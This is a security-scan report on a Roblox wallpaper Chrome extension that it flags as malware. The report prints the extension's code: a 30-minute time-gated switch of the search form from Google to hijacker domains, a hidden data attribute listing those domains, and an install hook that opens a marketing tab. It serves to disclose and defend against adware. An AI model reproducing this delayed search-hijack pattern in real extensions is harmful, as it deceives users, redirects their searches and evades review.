Security Alert: Confirmed Malware
Roblox HD Wallpapers
ID: ejijmkmnefpcibjmmcfcclnoknacbnpk
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- chromenewtab.comView Profile
- Privacy
- Privacy Policy
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
Give your browser a new look with Roblox backgrounds
The Roblox background application is available for you free of charge in the Chrome Store, in order to bring together the pictures that we have prepared specifically for the Roblox game, which has taken its place among the most popular games in the world. After our application is installed, every new tab you open will be decorated with wonderful Roblox pictures on your Chrome browser. Roblox App features ๐คก Awesome Roblox pictures in a new tab every time you open it ๐คก Dedicated search bar in the middle of the page ๐คก Shortcut icons of social media sites and shopping sites ๐คก date and time function at bottom right ๐คก Ability to use Roblox Background images as variable or fixed Yes, you read it right. After installing Extensions, you will have all the above features. Pictures that are not found anywhere will greet you in a new tab every time you open them. Dear Chrome Store users, the Star rating you gave us on the Extensions on the Chrome Store is very important to us, if you want us to reach more people, you can give us a Star rating, comment and share Minecraft Extensions with your friends.
After 30 minutes from install (1800 seconds, checked via `inti` timestamp stored at install time), the search form action is silently changed from Google to a randomly selected third-party domain: addilos.com, addiyos.com, or gundil.com. These domains are known adware/affiliate search hijacker endpoints. The 30-minute delay is a deliberate evasion technique to avoid detection during initial review or automated testing.
chrome.storage.local.get(['inti'], function(resultinti) { if (Math.floor(Date.now() / 1000) - resultinti.inti > 1800) { var sp = $("#sf") .data("sp") .split(","); var spr = sp[Math.floor(Math.random() * sp.length)]; $('#sf') .attr('action', 'https://www.' + spr + '.com/index.html'); }});The search form embeds the hidden `data-sp` attribute containing the list of hijack target domains (`addilos`, `addiyos`, `gundil`) that are substituted in place of Google after the 30-minute delay elapses. The form initially displays Google as the search provider to appear legitimate, masking the true intent. This attribute serves as the payload list for the search hijacking routine in 2PEl58.js.
< form id="sf" target="_top" action="https://www.google.com/search" method="get" class="search-form" data - sp="addilos,addiyos,gundil">On first install, the extension records an `inti` (install timestamp) used downstream to time-gate the search hijacking activation. It also immediately opens a new tab to `https://chromenewtab.com/roblox-2/` โ an external marketing page for the adware network โ without any user action. This install-time URL open drives traffic to the operator's website and the stored timestamp is the trigger for the delayed search redirect attack.
chrome.storage.local.set({ pageUrl: "https://chromenewtab.com/roblox-2/"}, function() {});chrome.runtime.onInstalled.addListener(function(details) { if (details.reason == "install") { chrome.runtime.setUninstallURL('https://chromenewtab.com/unistall/'); ... chrome.storage.local.set({ inti: Math.floor(Date.now() / 1000) }, function() {}); chrome.storage.local.get(['pageUrl'], function(result) { var localurl = result.pageUrl; chrome.tabs.create({ url: localurl }); }); }});By severity
Versions scanned
Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 0.3.41 | 3 |
Files with findings
3 distinct paths โ top paths by unique finding count:
- Kb0lTz/2PEl58.js1
- Kb0lTz/sEDEzjM.js1
- yxiFDi.html1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.